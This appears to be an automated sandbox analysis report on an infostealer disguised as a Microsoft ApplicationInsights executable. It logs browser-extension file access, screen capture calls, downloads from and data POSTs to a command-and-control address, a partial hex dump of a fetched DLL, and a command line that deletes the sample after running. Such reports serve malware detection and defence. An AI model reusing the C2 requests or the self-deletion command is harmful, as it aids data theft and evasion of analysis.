Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	2_2_00408820
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00407560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_004011F0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00408650
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00408410
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose,	2_2_00404DD0

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Networking:

Source: global traffic	HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1Host: 77.222.42.92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /goodnews.php HTTP/1.1Host: 77.222.42.92Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 13 Sep 2021 13:55:33 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: keep-aliveLast-Modified: Tue, 24 Aug 2021 22:41:19 GMTETag: "9d9d8-5ca55d50d41c0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d

Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.679113220.0000000002E91000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: https://dc.services.visualstudio.com/v2/trackY87C19923:
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00403E70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_00403E70

Source: global traffic	HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1Host: 77.222.42.92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /goodnews.php HTTP/1.1Host: 77.222.42.92Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_0040A840 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_0040A840

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

.NET source code contains very large array initializations

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_00B0D8BE	0_2_00B0D8BE
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDDA8C	0_2_02DDDA8C
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDC088	0_2_02DDC088
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDE150	0_2_02DDE150
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDA698	0_2_02DDA698
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040F550	2_2_0040F550
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040EF50	2_2_0040EF50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040F360	2_2_0040F360
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040FDE0	2_2_0040FDE0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_005AD8BE	2_2_005AD8BE

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: String function: 00403C80 appears 466 times

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAntiDump.dll2 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.727920654.0000000000B3F000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000002.00000000.675135509.00000000005DF000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Section loaded: onecoreuapcommonproxystub.dll

Jump to behavior

Source: sqlite3.dll.2.dr	Static PE information: Number of sections : 19 > 10
Source: sqlite3[1].dll.2.dr	Static PE information: Number of sections : 19 > 10

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Virustotal: Detection: 40%
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File read: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Jump to behavior

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe'
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFBB.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.spyw.evad.winEXE@9/9@0/1

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: sqlite3.dll.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: sqlite3.dll.2.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
